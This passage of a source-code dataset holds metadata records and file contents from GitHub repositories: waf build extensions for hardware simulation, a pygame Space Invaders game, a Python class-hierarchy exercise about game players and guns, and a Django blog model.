'ld')\n\tconf.xcheck_host_envar('CFLAGS')\n\tconf.xcheck_host_envar('CXXFLAGS')\n\tconf.xcheck_host_envar('LDFLAGS', 'LINKFLAGS')\n\tconf.xcheck_host_envar('LIB')\n\tconf.xcheck_host_envar('PKG_CONFIG_LIBDIR')\n\tconf.xcheck_host_envar('PKG_CONFIG_PATH')\n\t# TODO find a better solution than this ugliness\n\tif conf.env.PKG_CONFIG_PATH or conf.env.PKG_CONFIG_LIBDIR:\n\t\tconf.find_program('pkg-config', var='PKGCONFIG')\n\t\tconf.env.PKGCONFIG = [\n\t\t 'env',\n\t\t 'PKG_CONFIG_LIBDIR=%s' % (conf.env.PKG_CONFIG_LIBDIR[0]),\n\t\t 'PKG_CONFIG_PATH=%s' % (conf.env.PKG_CONFIG_PATH[0]),\n\t\t] + conf.env.PKGCONFIG\n"
},
{
"alpha_fraction": 0.6226415038108826,
"alphanum_fraction": 0.6415094137191772,
"avg_line_length": 24.5,
"blob_id": "de2e3a7f81cb6678516a95901151d82043250ae6",
"content_id": "3befbebaa7c14a7248ca80f75c5e98ab16ff91e0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 53,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 2,
"path": "/waf_test/basic_dependencies/l4/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\ndef configure(ctx):\n ctx.SFFUnits.add(use='l3')\n\n"
},
{
"alpha_fraction": 0.6183857917785645,
"alphanum_fraction": 0.6208975315093994,
"avg_line_length": 28.27450942993164,
"blob_id": "471acb804a27a806efc3204d93b8ee28180e41c9",
"content_id": "947948bb36941cbcfc8b1833f2325ad9adf95da7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5972,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 204,
"path": "/admin/waf/waf-extensions/SFFbuild.py",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# encoding: utf-8\n# Matthew Swabey, 2015\n# John Skubic, 2017\n\n\"\"\"\nClasses and helper functions used to provide\n\"sim_source\"\n\"verify_source\"\n\"dump_source\"\n\"\"\"\n\nimport os\nfrom waflib import Context\nfrom waflib import Build\nfrom waflib import Logs\nfrom waflib import Node\nfrom waflib import TaskGen\nfrom waflib import Task\nfrom waflib import Utils\nfrom waflib.Configure import conf\nfrom waflib.TaskGen import feature, before_method, after_method\nfrom SFFbuildmgr import SFF_verilog_scan\nfrom SFFbuildmgr import SFFUnitsCont, SFFUnit, SFFView, load_SFFUnits\nimport pickle\n# import needed simulation environments \nimport SFFincisive\nimport SFFmodelsim\n\nINCISIVE_ENV = 'incisive'\nMODELSIM_ENV = 'modelsim'\nVALID_ENVS = [INCISIVE_ENV, MODELSIM_ENV]\n\nSRC_DUMP = 'srcs.dump'\nINC_DUMP = 'incs.dump' \n\ndef get_sim_env():\n \"\"\"\n Checks the environment variables to decide the current simulation environment.\n \"\"\"\n sim_env = os.environ.get('SFF_SIM_ENV')\n if not (sim_env in VALID_ENVS):\n print(\"Unexpected Simulation Environment: \" + str(sim_env))\n print(\"Defaulting to \" + VALID_ENVS[0])\n return VALID_ENVS[0]\n return sim_env\n\ndef configure(ctx):\n \"\"\"\n Simulator: Find all the necessary parts of the chosen Simulator.\n \"\"\"\n sim_env = get_sim_env()\n\n if sim_env == INCISIVE_ENV:\n SFFincisive.configure(ctx)\n elif sim_env == MODELSIM_ENV:\n SFFmodelsim.configure(ctx) \n\nclass verify_source_ctx(Build.BuildContext):\n \"\"\"\n Subclass waflib.Build.BuildContext to create a new command called\n verify_source. This command will is a placeholder and will run\n sim_source after setting the ctx.env['verify_source'] key.\n \"\"\"\n cmd = 'verify_source'\n fun = 'verify_source'\n\nContext.g_module.__dict__['verify_source_ctx'] = verify_source_ctx\n\"\"\"\nInject the new verify_source command into the running waf build. Requires the\ntool be loaded in the options section to make it exist in both configure and\nbuild\n\"\"\"\n\ndef verify_source(ctx):\n sim_env = get_sim_env()\n\n if sim_env == INCISIVE_ENV:\n SFFincisive._simulate(ctx, '-exit')\n elif sim_env == MODELSIM_ENV:\n SFFmodelsim._simulate(ctx, '-c -do \"run -a;q\"')\n\nContext.g_module.__dict__['verify_source'] = verify_source\n\"\"\"Inject the verify_source command into the wscript\"\"\"\n\nclass sim_source_ctx(Build.BuildContext):\n \"\"\"\n Subclass waflib.Build.BuildContext to create a new command called\n sim_source. This will operate exactly like a build command but find and\n execute functions from wscript files called 'sim_source'\n \"\"\"\n cmd = 'sim_source'\n fun = 'sim_source'\n\nContext.g_module.__dict__['sim_source_ctx'] = sim_source_ctx\n\"\"\"\nInject the new sim_source command into the running waf build. Requires the tool\nbe loaded in the options section to make it exist in both configure and build\n\"\"\"\n\ndef sim_source(ctx):\n sim_env = get_sim_env()\n\n if sim_env == INCISIVE_ENV:\n SFFincisive._simulate(ctx, '-gui')\n elif sim_env == MODELSIM_ENV:\n SFFmodelsim._simulate(ctx, '')\n\nContext.g_module.__dict__['sim_source'] = sim_source\n\"\"\"Inject the sim_source command into the wscript\"\"\"\n\nclass dump_source_ctx(Build.BuildContext):\n cmd = 'dump_source'\n fun = 'dump_source'\n\nContext.g_module.__dict__['dump_source_ctx'] = dump_source_ctx\n\ndef dump_source(ctx):\n \"\"\" \n Load the SFFUnits into the system. \n Output each file to standard out.\n \"\"\"\n ctx.env['SFFUnits'] = load_SFFUnits(ctx)\n\n \"\"\"\n Creates the directory path and nodes in the build directory.\n Creates a taskgen from each other library in units_hdl\n \"\"\"\n top = ctx.env['SFFUnits'].getunit(ctx.env.top_level)\n\n \"\"\"\n Ensure the output files are all cleared before running the command\n to prevent duplicate files in the output.\n \"\"\"\n for u in top.synu_deps + top.simu_deps:\n lib = u.script.parent.get_bld().make_node('work_dump')\n src_file = ctx.out_dir + '/' + lib.bldpath() + '/' + SRC_DUMP\n inc_file = ctx.out_dir + '/' + lib.bldpath() + '/' + INC_DUMP\n try:\n os.remove(src_file)\n except:\n pass\n try:\n os.remove(inc_file)\n except:\n pass\n \n \n for u in top.synu_deps + top.simu_deps:\n lib = u.script.parent.get_bld().make_node('work_dump')\n lib.mkdir()\n \n if u.use('use'):\n tsk = DumpTask(\n name=u.name,\n source=u.use('src'),\n includes=u.use('includes'),\n after=u.use('use'),\n output=lib,\n scan=SFF_verilog_scan,\n env=ctx.env)\n ctx.add_to_group(tsk) \n else:\n tsk = DumpTask(\n name=u.name,\n source=u.use('src'),\n includes=u.use('includes'),\n output=lib,\n scan=SFF_verilog_scan,\n env=ctx.env)\n ctx.add_to_group(tsk)\n\nContext.g_module.__dict__['dump_source'] = dump_source\n\nclass DumpTask(Task.Task):\n def __init__(self, *k, **kw):\n Task.Task.__init__(self, *k, **kw)\n\n self.set_inputs(list(kw['source']))\n self.set_outputs(kw['output'])\n self.includes = kw['includes']\n from types import MethodType\n self.scan = MethodType(kw['scan'],self)\n\n def __str__(self):\n return '%s: %s\\n' % (self.__class__.__name__,self.outputs[0])\n\n def run(self):\n src = ''\n for s in self.inputs:\n src += s.bldpath() + '\\n'\n tgt = self.outputs[0].bldpath()\n incs = ''\n if hasattr(self.generator,'includes'):\n incs = ''\n for inc in getattr(self.generator,'includes'):\n incs += inc.bldpath() + '\\n'\n src_file = self.outputs[0].bldpath()+'/'+ SRC_DUMP\n inc_file = self.outputs[0].bldpath()+'/'+ INC_DUMP\n cmd_src = \"echo '%s' >> %s\" % (src, src_file)\n cmd_include = \"echo '%s' >> %s\" % (incs, inc_file)\n cmd = \"%s;%s\" % (cmd_src, cmd_include)\n \n return self.exec_command(cmd)\n"
},
{
"alpha_fraction": 0.6544789671897888,
"alphanum_fraction": 0.6563071012496948,
"avg_line_length": 21.79166603088379,
"blob_id": "a54eee2e5b971a75c70b37ff5cf00a1355190d95",
"content_id": "bd4ce6c6c8b79542e2c20a1afcc10dd64cb6cb4e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 547,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 24,
"path": "/waf_test/RTL_compiler/basic/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# encoding: utf-8\n\nimport os\ntoolpath = os.environ['WAFDIR'] + '/../waf-extensions'\n\ntop = '.'\nout = 'build'\n\ndef options(ctx):\n ctx.load('SoC_build_mgr', tooldir=toolpath)\n ctx.load('Incisive', tooldir=toolpath)\n ctx.load('RTL_compiler', tooldir=toolpath)\n ctx.load('why')\n\ndef configure(ctx):\n ctx.load('SoC_build_mgr', tooldir=toolpath)\n ctx.load('Incisive', tooldir=toolpath)\n ctx.load('RTL_compiler', tooldir=toolpath)\n ctx.recurse('uart')\n ctx.recurse('dual_uart')\n\ndef build(ctx):\n pass\n"
},
{
"alpha_fraction": 0.5789473652839661,
"alphanum_fraction": 0.6184210777282715,
"avg_line_length": 36,
"blob_id": "f5a12af070335d3d289426e41bd48b9c3581c3fd",
"content_id": "3b9c7e69ce8f37cf0575547ecd5d43d9f15a11a2",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 76,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 2,
"path": "/waf_test/basic_dependencies/basic_dependencies/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\ndef configure(ctx):\n ctx.SFFUnits.add(tb='foo',use='l4',tb_use='l2_5')\n\n"
}
] | 25 |
FurkanAdemoglu/PyGame | https://github.com/FurkanAdemoglu/PyGame | 005ab4b87f3e088a74a9dd35d1925631f6629f7e | e1761d269948b13653fbf1cff858afef52907b69 | 777973482b3df7db1cefd9998b6e9fbbde2f8162 | refs/heads/master | 2022-11-05T08:31:50.821829 | 2020-06-15T09:32:51 | 2020-06-15T09:32:51 | 272,396,618 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5756648778915405,
"alphanum_fraction": 0.6041421294212341,
"avg_line_length": 22.715116500854492,
"blob_id": "f14fb8d48a9501e9da237fd6e7de678ef851807d",
"content_id": "46680571a48f415c62e0392daf43c371b32229b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4249,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 172,
"path": "/PyGame/main.py",
"repo_name": "FurkanAdemoglu/PyGame",
"src_encoding": "UTF-8",
"text": "import pygame\r\nimport random\r\nimport math\r\nfrom pygame import mixer\r\n#Initialize the pygame\r\npygame.init()\r\n\r\n\r\n#create screen\r\nscreen= pygame.display.set_mode((800,600))\r\n\r\n#Background\r\nbackground=pygame.image.load('background.png')\r\n\r\n#Background Sound\r\nmixer.music.load('background.wav')\r\nmixer.music.play(-1)\r\n\r\n\r\n#Title and Icon\r\npygame.display.set_caption(\"Space Invaders\")\r\nicon=pygame.image.load('technology.png')\r\npygame.display.set_icon(icon)\r\n\r\n#Player\r\nplayerImg=pygame.image.load('gaming.png')\r\nplayerX=370\r\nplayerY=480\r\nplayerX_change=0\r\n\r\n#Enemy\r\nenemyImg=[]\r\nenemyX=[]\r\nenemyY=[]\r\nenemyX_change=[]\r\nenemyY_change=[]\r\nnum_of_enemies=6\r\nfor i in range(num_of_enemies):\r\n enemyImg.append(pygame.image.load('enemy.png'))\r\n enemyX.append(random.randint(0,735))\r\n enemyY.append(random.randint(50,150))\r\n enemyX_change.append(4)\r\n enemyY_change.append(40)\r\n\r\n#Bullet\r\n\r\n#Ready-You cant see the bullet on the screen\r\n#Fire- The bullet is currently moving\r\nbulletImg=pygame.image.load('bullet.png')\r\nbulletX=0\r\nbulletY=480\r\nbulletX_change=0\r\nbulletY_change=10\r\nbullet_state=\"ready\"\r\n\r\n#Score\r\nscore_value=0\r\nfont=pygame.font.Font('freesansbold.ttf',32)\r\n\r\ntextX=10\r\ntextY=10\r\n\r\n#Game Over Text\r\nover_font=pygame.font.Font('freesansbold.ttf',64)\r\n\r\ndef show_score(x,y):\r\n score=font.render(\"Score:\"+str(score_value),True,(255,255,255))\r\n screen.blit(score,(x,y))\r\n\r\ndef game_over_text():\r\n over_text=over_font.render(\"GAME OVER\",True,(255,255,255))\r\n screen.blit(over_text,(200,250))\r\n\r\n\r\ndef player(x,y):\r\n screen.blit(playerImg,(x,y))\r\n\r\ndef enemy(x,y,i):\r\n screen.blit(enemyImg[i],(x,y))\r\n\r\ndef fire_bullet(x,y):\r\n global bullet_state\r\n bullet_state=\"fire\"\r\n screen.blit(bulletImg,(x+16,y+10))\r\n\r\ndef isCollision(enemyX,enemyY,bulletX,bulletY):\r\n distance=math.sqrt((math.pow(enemyX-bulletX,2))+(math.pow(enemyY-bulletY,2)))\r\n if distance <27:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n\r\n#Game Loop\r\nrunning=True\r\nwhile running:\r\n #RGB=RED GREEN BLUE\r\n screen.fill((0, 0, 0))\r\n\r\n #Background Image\r\n screen.blit(background,(0,0))\r\n for event in pygame.event.get():\r\n if event.type==pygame.QUIT:\r\n running=False\r\n if event.type==pygame.KEYDOWN:\r\n\r\n if event.key==pygame.K_LEFT:\r\n playerX_change=-5\r\n if event.key ==pygame.K_RIGHT:\r\n playerX_change=5\r\n if event.key==pygame.K_SPACE:\r\n if bullet_state is \"ready\":\r\n\r\n bullet_Sound=mixer.Sound('laser.wav')\r\n bullet_Sound.play()\r\n #Get the current x coordinate of the spaceship\r\n bulletX=playerX\r\n fire_bullet(bulletX,bulletY)\r\n\r\n if event.type ==pygame.KEYUP:\r\n if event.key==pygame.K_LEFT or event.key==pygame.K_RIGHT:\r\n playerX_change=0\r\n\r\n #Checking for boundries of spacesship so it doesn't go out pf bounds\r\n playerX+=playerX_change\r\n if playerX<=0:\r\n playerX=0\r\n elif playerX>=736:\r\n playerX=736\r\n #Enemy Movement\r\n for i in range(num_of_enemies):\r\n #Game Over\r\n if enemyY[i]>500:\r\n for j in range(num_of_enemies):\r\n enemyY[j]=2000\r\n game_over_text()\r\n break\r\n\r\n enemyX[i] += enemyX_change[i]\r\n if enemyX[i] <= 0:\r\n enemyX_change[i] = 4\r\n enemyY[i]+=enemyY_change[i]\r\n elif enemyX[i] >= 736:\r\n enemyX_change[i] = -4\r\n enemyY[i]+=enemyY_change[i]\r\n # Collision\r\n collision = isCollision(enemyX[i], enemyY[i], bulletX, bulletY)\r\n if collision:\r\n explosion_Sound=mixer.Sound('explosion.wav')\r\n explosion_Sound.play()\r\n bulletY = 480\r\n bullet_state = \"ready\"\r\n score_value += 1\r\n\r\n enemyX [i]= random.randint(0, 800)\r\n enemyY [i]= random.randint(50, 150)\r\n enemy(enemyX[i],enemyY[i],i)\r\n #Bullet movement\r\n if bulletY<=0:\r\n bulletY=480\r\n bullet_state=\"ready\"\r\n\r\n if bullet_state is \"fire\":\r\n fire_bullet(playerX,bulletY)\r\n bulletY-=bulletY_change\r\n\r\n\r\n\r\n player(playerX,playerY)\r\n show_score(textX,textY)\r\n pygame.display.update()"
}
] | 1 |
dineshc810/Python_oops | https://github.com/dineshc810/Python_oops | 2de32c3029732b13e6fe3e00c46437ee11c84ee7 | 67ed1aa15e20fb4550f3f12508c9ad6081744231 | 25494ded3db46ab9f1c80784aa01dbd5e7de31c6 | refs/heads/master | 2022-11-20T18:24:56.077704 | 2020-07-27T12:13:08 | 2020-07-27T12:13:08 | 282,821,491 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4829559922218323,
"alphanum_fraction": 0.49224117398262024,
"avg_line_length": 28.778656005859375,
"blob_id": "ea1b8ed4537fe7665bec233e44d11ab1c1378da2",
"content_id": "317452ae67f422cb0da59a66f21840d973224611",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7862,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 253,
"path": "/python_oops.py",
"repo_name": "dineshc810/Python_oops",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 22 18:21:07 2020\r\n\r\n@author: Dinesh.Choudhary\r\n\"\"\"\r\n \r\nclass Player:\r\n def __init__(self):\r\n self.type=self.__class__.__name__\r\n\r\n\r\nclass Terrorist(Player): \r\n def __init__(self):\r\n self.type=f'{Player.__name__}:{self.__class__.__name__}'\r\n \r\nclass Counter_Terrorist(Player): \r\n def __init__(self):\r\n self.type=f'{Player.__name__}:{self.__class__.__name__}'\r\n\r\n\r\n \r\nclass T1(Terrorist): \r\n def __init__(self):\r\n self.type=f'{Player. __name__}:{Terrorist.__name__}:{self.__class__.__name__}'\r\n \r\nclass T2(Terrorist): \r\n def __init__(self):\r\n self.type=f'{Player. __name__}:{Terrorist.__name__}:{self.__class__.__name__}'\r\n \r\nclass CT1(Counter_Terrorist): \r\n def __init__(self):\r\n self.type=f'{Player. __name__}:{Counter_Terrorist.__name__}:{self.__class__.__name__}'\r\n \r\nclass CT2(Counter_Terrorist): \r\n def __init__(self):\r\n self.type=f'{Player. __name__}:{Counter_Terrorist.__name__}:{self.__class__.__name__}'\r\n \r\n\r\n\r\n\r\nclass Gun:\r\n def __init__(self):\r\n self.type=self.__class__.__name__\r\n \r\n \r\nclass Pistol(Gun):\r\n def __init__(self):\r\n self.type=f'{Gun.__name__}:{self.__class__.__name__}'\r\n\r\nclass Rifle(Gun):\r\n def __init__(self):\r\n self.type=f'{Gun.__name__}:{self.__class__.__name__}'\r\n\r\n\r\n\r\nclass Flare_Gun(Pistol):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Pistol.__name__}:{self.__class__.__name__}'\r\n \r\nclass Deagle(Pistol):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Pistol.__name__}:{self.__class__.__name__}' \r\n\r\nclass Skorpion(Pistol):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Pistol.__name__}:{self.__class__.__name__}' \r\n\r\nclass Assault_Rifle(Rifle):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{self.__class__.__name__}'\r\n \r\nclass Sniper(Rifle):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{self.__class__.__name__}'\r\n \r\nclass Shotgun(Rifle):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{self.__class__.__name__}'\r\n\r\nclass Machinegun(Rifle):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{self.__class__.__name__}' \r\n \r\nclass Groza(Assault_Rifle):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{Assault_Rifle.__name__}:{self.__class__.__name__}'\r\n \r\nclass AK47(Assault_Rifle):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{Assault_Rifle.__name__}:{self.__class__.__name__}'\r\n \r\nclass AWM(Sniper):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{Sniper.__name__}:{self.__class__.__name__}'\r\n\r\nclass M24(Sniper):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{Sniper.__name__}:{self.__class__.__name__}' \r\n \r\nclass DBS(Shotgun):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{Shotgun.__name__}:{self.__class__.__name__}'\r\n \r\nclass S686(Shotgun):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{Shotgun.__name__}:{self.__class__.__name__}' \r\n \r\nclass MG42(Machinegun):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{Machinegun.__name__}:{self.__class__.__name__}' \r\n \r\nclass ThompsonMG(Machinegun):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{Machinegun.__name__}:{self.__class__.__name__}' \r\n \r\n\r\n\r\nplayer=Player()\r\nterrorist=Terrorist()\r\ncounter_terrorist=Counter_Terrorist() \r\nt1=T1()\r\nt2=T2()\r\nct1=CT1()\r\nct2=CT2()\r\n\r\n\r\ngun=Gun()\r\n\r\npistol=Pistol()\r\nrifle=Rifle()\r\n\r\nflare_gun=Flare_Gun()\r\ndeagle=Deagle()\r\nskorpion=Skorpion()\r\nassault_rifle=Assault_Rifle()\r\nsniper=Sniper()\r\nshotgun=Shotgun()\r\nmachinegun=Machinegun()\r\n\r\ngroza=Groza()\r\nak47=AK47()\r\nawm=AWM()\r\nm24=M24()\r\ndbs=DBS()\r\ns686=S686()\r\nmg42=MG42()\r\nthompsonmg=ThompsonMG()\r\n\r\n\r\n\r\n\r\n\r\n#main\r\n\r\nprint(\"Enter the player: (Terrorist)(Counter Terrorist)\")\r\nplayer_input=input()\r\n\r\nprint(\"Enter the player type: (T1)(T2)(CT1)(CT2)\")\r\nplayer_type_input=input()\r\n\r\nprint(\"Enter the gun: (Pistol)(Rifle)\")\r\ngun_input=input()\r\n\r\nprint(\"Enter the gun type: (Flare gun)(Deagle)(Skorpion)(Assault Rifle)(Sniper)(Shotgun)(Machine gun)\")\r\ngun_type_input=input()\r\n\r\nprint(\"Enter the gun sub type: (Groza)(AK47)(M24)(AWM)(DBS)(S686)((MG42)(Thompson MG)\")\r\ngun_subtype_input=input()\r\n\r\n\r\n\r\nif(player_input=='Terrorist'):\r\n if (player_type_input=='T1'):\r\n print(t1.type)\r\n \r\n if(gun_input=='Pistol'):\r\n if (gun_type_input=='Flare Gun'):\r\n print(flare_gun.type)\r\n elif (gun_type_input=='Deagle'):\r\n print(deagle.type) \r\n elif (gun_type_input=='Skorpion'):\r\n print(skorpion.type) \r\n elif (gun_input=='Rifle'): \r\n if (gun_type_input=='Assault Rifle'):\r\n print(assault_rifle.type)\r\n if (gun_type_input=='Sniper'):\r\n print(sniper.type) \r\n if (gun_type_input=='Shotgun'):\r\n print(shotgun.type)\r\n if (gun_type_input=='Machinegun'):\r\n print(machinegun.type) \r\n \r\n elif (player_type_input=='T2'):\r\n print(t2.type) \r\n \r\n if(gun_input=='Pistol'):\r\n if (gun_type_input=='Flare Gun'):\r\n print(flare_gun.type)\r\n elif (gun_type_input=='Deagle'):\r\n print(deagle.type) \r\n elif (gun_type_input=='Skorpion'):\r\n print(skorpion.type) \r\n elif (gun_input=='Rifle'): \r\n if (gun_type_input=='Assault Rifle'):\r\n print(assault_rifle.type)\r\n if (gun_type_input=='Sniper'):\r\n print(sniper.type) \r\n if (gun_type_input=='Shotgun'):\r\n print(shotgun.type)\r\n if (gun_type_input=='Machinegun'):\r\n print(machinegun.type) \r\n \r\nelif(player_input=='Counter Terrorist'):\r\n if (player_type_input=='CT1'):\r\n print(ct1.type)\r\n \r\n if(gun_input=='Pistol'):\r\n if (gun_type_input=='Flare Gun'):\r\n print(flare_gun.type)\r\n elif (gun_type_input=='Deagle'):\r\n print(deagle.type) \r\n elif (gun_type_input=='Skorpion'):\r\n print(skorpion.type) \r\n elif (gun_input=='Rifle'): \r\n if (gun_type_input=='Assault Rifle'):\r\n print(assault_rifle.type)\r\n if (gun_type_input=='Sniper'):\r\n print(sniper.type) \r\n if (gun_type_input=='Shotgun'):\r\n print(shotgun.type)\r\n if (gun_type_input=='Machinegun'):\r\n print(machinegun.type) \r\n \r\n elif (player_type_input=='CT2'):\r\n print(ct2.type) \r\n \r\n if(gun_input=='Pistol'):\r\n if (gun_type_input=='Flare Gun'):\r\n print(flare_gun.type)\r\n elif (gun_type_input=='Deagle'):\r\n print(deagle.type) \r\n elif (gun_type_input=='Skorpion'):\r\n print(skorpion.type) \r\n elif (gun_input=='Rifle'): \r\n if (gun_type_input=='Assault Rifle'):\r\n print(assault_rifle.type)\r\n if (gun_type_input=='Sniper'):\r\n print(sniper.type) \r\n if (gun_type_input=='Shotgun'):\r\n print(shotgun.type)\r\n if (gun_type_input=='Machinegun'):\r\n print(machinegun.type) \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
}
] | 1 |
thomaskey/i3workspace | https://github.com/thomaskey/i3workspace | b391c7c9a2f9e0d5cdd9210fecc5ec4d7f98d332 | 905a2670bf415fd3cf80f17a5c6bd806786c5032 | 4cf52e0bc5c2f01ef3afdfee7b2ecddb70112c9d | refs/heads/master | 2020-09-23T22:44:01.472574 | 2016-08-29T17:28:28 | 2016-08-29T17:28:28 | 65,956,797 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6108325123786926,
"alphanum_fraction": 0.6238716244697571,
"avg_line_length": 24.564102172851562,
"blob_id": "3cdcd9d4dae3b622dadcfaed7a01e8036cb4dd96",
"content_id": "e0dc55081f93fbe2545f4f0693519420f9bd2178",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 997,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 39,
"path": "/scripts/wmdev.py",
"repo_name": "thomaskey/i3workspace",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n\nimport i3ipc\nimport time\nimport os\nfrom argparse import ArgumentParser\n\ni3 = i3ipc.Connection()\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('-d');\n args = parser.parse_args()\n path = args.d;\n if path is None:\n path = os.getcwd()\n \n do_cmd(\"split v\")\n do_cmd(\"exec i3-sensible-terminal -cd \" + path)\n do_cmd(\"split v\")\n do_cmd(\"layout tabbed\")\n do_cmd(\"exec i3-sensible-terminal -cd \" + path)\n do_cmd(\"exec i3-sensible-terminal -cd \" + path)\n do_cmd(\"exec i3-sensible-terminal -cd \" + path)\n do_cmd(\"focus up\")\n do_cmd(\"split v\")\n do_cmd(\"layout tabbed\")\n do_cmd(\"exec i3-sensible-terminal -cd \" + path)\n do_cmd(\"exec i3-sensible-terminal -cd \" + path)\n do_cmd(\"exec i3-sensible-terminal -cd \" + path)\n do_cmd(\"focus left\")\n do_cmd(\"focus left\")\n\ndef do_cmd(command):\n #I am ignorant on how to do python async, so here is some shit code\n i3.command(command)\n time.sleep(.1)\n\nmain()\n"
}
] | 1 |
leelum1/mysite | https://github.com/leelum1/mysite | 1f0ee68285005fd1d2ee6dbc1ab8afa19827ef04 | 863f5ac058174ad010b0a70dd72f7277731160a1 | b6ebd32f844b414364944891acf3b13d6c365472 | refs/heads/master | 2023-02-01T13:23:03.177047 | 2020-12-18T03:19:36 | 2020-12-18T03:19:36 | 282,359,583 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7011191844940186,
"alphanum_fraction": 0.7109940648078918,
"avg_line_length": 33.522727966308594,
"blob_id": "ad8801428cdf22ff2a080d2c5b46ca8d71c272ff",
"content_id": "9c4670bc844105ea92c7306e0553f69cc4a38dbf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1519,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 44,
"path": "/blog_app/models.py",
"repo_name": "leelum1/mysite",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.db.models.signals import pre_save\nfrom django.urls import reverse\nfrom django.utils.text import slugify\nfrom markdownx.models import MarkdownxField\n\n# Create your models here.\nclass Post(models.Model):\n title = models.CharField(max_length=225, unique=True)\n slug = models.SlugField()\n keywords = models.CharField(max_length=125)\n is_private = models.BooleanField(default=False)\n is_published = models.BooleanField(default=False)\n cover = models.ImageField(upload_to='blog_images/', blank=True)\n cover_caption = models.CharField(max_length=512, blank=True)\n summary = models.CharField(max_length=512)\n text = MarkdownxField()\n date_created = models.DateTimeField(auto_now_add=True)\n date_updated = models.DateTimeField(auto_now=True)\n\n class Meta:\n ordering = ['-date_updated']\n\n def get_absolute_url(self):\n return reverse('blog_app:detail', kwargs={'slug':self.slug})\n\n def __str__(self):\n return self.title\n\nclass BlogImage (models.Model):\n blog = models.ForeignKey(Post, on_delete = models.CASCADE)\n image = models.ImageField(upload_to='blog_images/')\n caption = models.CharField(max_length=512, blank=True)\n is_main = models.BooleanField(default=False)\n\n def __str__(self):\n return self.blog.title\n\n\ndef create_slug(sender, instance, *args, **kwargs):\n if instance.title and not instance.slug:\n instance.slug = slugify(instance.title)\n\npre_save.connect(create_slug, sender=Post)\n"
},
{
"alpha_fraction": 0.6829113960266113,
"alphanum_fraction": 0.6854430437088013,
"avg_line_length": 33.34782791137695,
"blob_id": "4c8e7d73ab60d27704840a3ac1c9af43ad0e17b9",
"content_id": "a9592f0a94b24d4b0378753e3106f3c30afbfd7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1580,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 46,
"path": "/blog_app/views.py",
"repo_name": "leelum1/mysite",
"src_encoding": "UTF-8",
